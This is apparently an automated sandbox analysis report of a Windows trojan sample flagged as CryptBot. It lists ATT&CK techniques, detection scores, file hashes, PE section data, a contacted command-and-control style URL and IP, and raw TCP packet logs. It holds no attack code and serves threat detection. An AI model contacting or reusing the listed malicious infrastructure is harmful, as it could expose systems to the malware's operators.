ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		Remote Services11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
QMtCX5RLOP.exe46%VirustotalBrowse
QMtCX5RLOP.exe58%ReversingLabsWin32.Trojan.CryptBot
QMtCX5RLOP.exe100%AviraTR/Crypt.TPM.Gen
QMtCX5RLOP.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a10%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fiveth5ht.top
81.29.149.125
truefalse
    		high
    httpbin.org
    		34.226.108.155
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862false
        		high
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmlQMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpfalse
            		high
            http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpfalse
              		high
              http://html4/loose.dtdQMtCX5RLOP.exe, 00000000.00000003.1695888005.0000000007100000.00000004.00001000.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpfalse
                		high
                https://curl.se/docs/alt-svc.html#QMtCX5RLOP.exefalse
                  		high
                  http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1QMtCX5RLOP.exe, 00000000.00000002.1828476400.00000000007EE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://httpbin.org/ipbeforeQMtCX5RLOP.exe, 00000000.00000003.1695888005.0000000007100000.00000004.00001000.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpfalse
                    		high
                    https://curl.se/docs/http-cookies.htmlQMtCX5RLOP.exe, QMtCX5RLOP.exe, 00000000.00000003.1695888005.0000000007100000.00000004.00001000.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpfalse
                      		high
                      https://curl.se/docs/hsts.html#QMtCX5RLOP.exefalse
                        		high
                        http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSQMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpfalse
                          		high
                          https://curl.se/docs/http-cookies.html#QMtCX5RLOP.exefalse
                            		high
                            https://curl.se/docs/alt-svc.htmlQMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpfalse
                              		high
                              http://.cssQMtCX5RLOP.exe, 00000000.00000003.1695888005.0000000007100000.00000004.00001000.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpfalse
                                		high
                                http://.jpgQMtCX5RLOP.exe, 00000000.00000003.1695888005.0000000007100000.00000004.00001000.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  34.226.108.155
                                  		httpbin.orgUnited States
                                  		14618AMAZON-AESUSfalse
                                  81.29.149.125
                                  		home.fiveth5ht.topSwitzerland
                                  		39616COMUNICA_IT_SERVICESCHfalse

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1581598
                                  Start date and time:2024-12-28 09:41:51 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 5m 0s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:4
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:QMtCX5RLOP.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:3657bc0028f37da206a1530aa895f62e.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Stop behavior analysis, all processes terminated

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                  • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  03:42:51API Interceptor4x Sleep call for process: QMtCX5RLOP.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  34.226.108.155es5qBEFupj.exeGet hashmaliciousLummaCBrowse
                                    s8kPMNXOZY.exeGet hashmaliciousUnknownBrowse
                                      sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                        CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                          f7qbEfJl0B.exeGet hashmaliciousUnknownBrowse
                                            5KwhHEdmM4.exeGet hashmaliciousUnknownBrowse
                                              dZsdMl5Pwl.exeGet hashmaliciousUnknownBrowse
                                                OAKPYEH4c6.exeGet hashmaliciousLummaCBrowse
                                                  ZTM2pfyhu3.exeGet hashmaliciousLummaCBrowse
                                                    BkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                                      81.29.149.125s8kPMNXOZY.exeGet hashmaliciousUnknownBrowse
                                                      • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                      GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                                      • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                      sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                                      • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                      xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                                      • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      httpbin.orges5qBEFupj.exeGet hashmaliciousLummaCBrowse
                                                      • 34.226.108.155
                                                      s8kPMNXOZY.exeGet hashmaliciousUnknownBrowse
                                                      • 34.226.108.155
                                                      vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                      • 3.218.7.103
                                                      GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                                      • 3.218.7.103
                                                      sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                                      • 34.226.108.155
                                                      CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                      • 34.226.108.155
                                                      xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                                      • 3.218.7.103
                                                      f7qbEfJl0B.exeGet hashmaliciousUnknownBrowse
                                                      • 34.226.108.155
                                                      E205fJJS1Q.exeGet hashmaliciousLummaCBrowse
                                                      • 3.218.7.103
                                                      5KwhHEdmM4.exeGet hashmaliciousUnknownBrowse
                                                      • 34.226.108.155
                                                      home.fiveth5ht.tops8kPMNXOZY.exeGet hashmaliciousUnknownBrowse
                                                      • 81.29.149.125
                                                      GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                                      • 81.29.149.125
                                                      sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                                      • 81.29.149.125
                                                      xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                                      • 81.29.149.125
                                                      f7qbEfJl0B.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      5KwhHEdmM4.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      dZsdMl5Pwl.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      BkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      COMUNICA_IT_SERVICESCHs8kPMNXOZY.exeGet hashmaliciousUnknownBrowse
                                                      • 81.29.149.125
                                                      GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                                      • 81.29.149.125
                                                      sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                                      • 81.29.149.125
                                                      xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                                      • 81.29.149.125
                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                      • 81.29.149.45
                                                      hmips.elfGet hashmaliciousUnknownBrowse
                                                      • 81.29.149.178
                                                      ppc.elfGet hashmaliciousUnknownBrowse
                                                      • 81.29.149.178
                                                      mips.elfGet hashmaliciousUnknownBrowse
                                                      • 81.29.149.178
                                                      x86.elfGet hashmaliciousUnknownBrowse
                                                      • 81.29.149.178
                                                      hmips.elfGet hashmaliciousUnknownBrowse
                                                      • 81.29.149.178
                                                      AMAZON-AESUSes5qBEFupj.exeGet hashmaliciousLummaCBrowse
                                                      • 34.226.108.155
                                                      s8kPMNXOZY.exeGet hashmaliciousUnknownBrowse
                                                      • 34.226.108.155
                                                      vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                      • 3.218.7.103
                                                      GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                                      • 3.218.7.103
                                                      sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                                      • 34.226.108.155
                                                      CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                      • 34.226.108.155
                                                      xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                                      • 3.218.7.103
                                                      https://fin.hiringplatform.ca/processes/197662-tax-legislation-officer-ec-06-ec-07?locale=enGet hashmaliciousUnknownBrowse
                                                      • 54.225.146.64
                                                      d8tp5flwzP.exeGet hashmaliciousMetasploitBrowse
                                                      • 18.209.65.151
                                                      f7qbEfJl0B.exeGet hashmaliciousUnknownBrowse
                                                      • 34.226.108.155

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      No created / dropped files found

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                      Entropy (8bit):7.984364102018198
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • VXD Driver (31/22) 0.00%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:QMtCX5RLOP.exe
                                                      File size:4'480'512 bytes
                                                      MD5:3657bc0028f37da206a1530aa895f62e
                                                      SHA1:b23e3ac015967159f244b2ab5dde165232a797d9
                                                      SHA256:85aca9b9c7eed56fcd7f62f7775c4e16555532497a7a657a8973f7dfc9e791ca
                                                      SHA512:589a567fa6943180b4fb38e32ffdb9d78975feb65f1e1369437753857199eebb2f6383e1248f3d1ad526df92b2a96d2d46c2fd8d9939c44e7e95354582f24c07
                                                      SSDEEP:98304:gvgc3jdMcGy7WYVV09ol4PGUA8Dj+ibl3cQKRMoEUVKFo:gIc3jdMLsdV0eCXFCQAhg
                                                      TLSH:F226331D8B6604DAD0C7E672E8A3C24FFA44299EE54E83CB7A0F69CE76446F7A401570
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2...p....... I...@..................................OE...@... ............................

                                                      File Icon

                                                      Icon Hash:90cececece8e8eb0

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x1027000
                                                      Entrypoint Section:.taggant
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                      DLL Characteristics:DYNAMIC_BASE
                                                      Time Stamp:0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                      Authenticode Signature

                                                      Signature Valid:
                                                      Signature Issuer:
                                                      Signature Validation Error:
                                                      Error Number:
                                                      Not Before, Not After
                                                        Subject Chain
                                                          Version:
                                                          Thumbprint MD5:
                                                          Thumbprint SHA-1:
                                                          Thumbprint SHA-256:
                                                          Serial:

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp 00007F9D00DDE50Ah

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x6dd05f0x73.idata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x6dc0000x1ac.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x708a000x688
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xc256380x10omzymeri
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0xc255e80x18omzymeri
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          0x10000x6db0000x288a0005d85843f85b1ec54f9d6ec70d294d2aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x6dc0000x1ac0x2006411d28034dd354db735cb082bda64d0False0.58203125data4.532300238242443IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .idata 0x6dd0000x10000x2006363462e4ea156e03144265f6be7871eFalse0.166015625data1.1763897754724144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          0x6de0000x38e0000x200732729c873d8e12815dc79a2405f992aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          omzymeri0xa6c0000x1ba0000x1b98003460df6ef069d2ffb4633cb053a4b742False0.9944679890996603data7.954409366201115IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          rconqxqs0xc260000x10000x400c4f4df79a145a46b6b1821723e21816dFalse0.7939453125data6.232971783969218IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .taggant0xc270000x30000x2200be8012ad93764de48b778be1c5a4dde0False0.006433823529411764DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_MANIFEST0xc256480x152ASCII text, with CRLF line terminators0.6479289940828402

                                                          Imports

                                                          DLLImport
                                                          kernel32.dlllstrcpy

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 28, 2024 09:42:45.894118071 CET49730443192.168.2.434.226.108.155
                                                          Dec 28, 2024 09:42:45.894167900 CET4434973034.226.108.155192.168.2.4
                                                          Dec 28, 2024 09:42:45.894243956 CET49730443192.168.2.434.226.108.155
                                                          Dec 28, 2024 09:42:45.906853914 CET49730443192.168.2.434.226.108.155
                                                          Dec 28, 2024 09:42:45.906877995 CET4434973034.226.108.155192.168.2.4
                                                          Dec 28, 2024 09:42:47.706085920 CET4434973034.226.108.155192.168.2.4
                                                          Dec 28, 2024 09:42:47.706631899 CET49730443192.168.2.434.226.108.155
                                                          Dec 28, 2024 09:42:47.706646919 CET4434973034.226.108.155192.168.2.4
                                                          Dec 28, 2024 09:42:47.708106995 CET4434973034.226.108.155192.168.2.4
                                                          Dec 28, 2024 09:42:47.708168030 CET49730443192.168.2.434.226.108.155
                                                          Dec 28, 2024 09:42:47.709549904 CET49730443192.168.2.434.226.108.155
                                                          Dec 28, 2024 09:42:47.709666967 CET4434973034.226.108.155192.168.2.4
                                                          Dec 28, 2024 09:42:47.717418909 CET49730443192.168.2.434.226.108.155
                                                          Dec 28, 2024 09:42:47.717442989 CET4434973034.226.108.155192.168.2.4
                                                          Dec 28, 2024 09:42:47.772209883 CET49730443192.168.2.434.226.108.155
                                                          Dec 28, 2024 09:42:48.046726942 CET4434973034.226.108.155192.168.2.4
                                                          Dec 28, 2024 09:42:48.046850920 CET4434973034.226.108.155192.168.2.4
                                                          Dec 28, 2024 09:42:48.046901941 CET49730443192.168.2.434.226.108.155
                                                          Dec 28, 2024 09:42:48.054733992 CET49730443192.168.2.434.226.108.155
                                                          Dec 28, 2024 09:42:48.054766893 CET4434973034.226.108.155192.168.2.4
                                                          Dec 28, 2024 09:42:50.529264927 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:50.649255037 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:50.649343967 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:50.650363922 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:50.769958973 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:50.770020962 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:50.770030022 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:50.770064116 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:50.770072937 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:50.770102024 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:50.770133972 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:50.770144939 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:50.770153046 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:50.770180941 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:50.770194054 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:50.770222902 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:50.770230055 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:50.770258904 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:50.770272970 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:50.770298004 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:50.770332098 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:50.770359993 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:50.770374060 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:50.770392895 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:50.889820099 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:50.889905930 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:50.889938116 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:50.889940977 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:50.889982939 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:50.889986038 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:50.890002012 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:50.890016079 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:50.890028954 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:50.890047073 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:50.890059948 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:50.890101910 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:50.933697939 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:50.933861971 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.052763939 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.052849054 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.100610018 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.220658064 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.220736980 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.420722008 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.420800924 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.631761074 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.631980896 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.632213116 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.751827955 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.751892090 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.751944065 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.751977921 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.751997948 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.752113104 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.752121925 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.752125025 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.752150059 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.752229929 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.752238035 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.752315998 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.752361059 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.752370119 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.752408028 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.752422094 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.752464056 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.752499104 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.752552032 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.752628088 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.752676010 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.752705097 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.752748013 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.752757072 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.752830982 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.752928019 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.752975941 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.753083944 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.753185987 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.753226995 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.753314018 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.753344059 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.753464937 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.753504992 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.753585100 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.753671885 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.753715992 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.753726006 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.753736019 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.753762960 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.753786087 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.753818035 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.753866911 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.753921032 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.753974915 CET4973180192.168.2.481.29.149.125
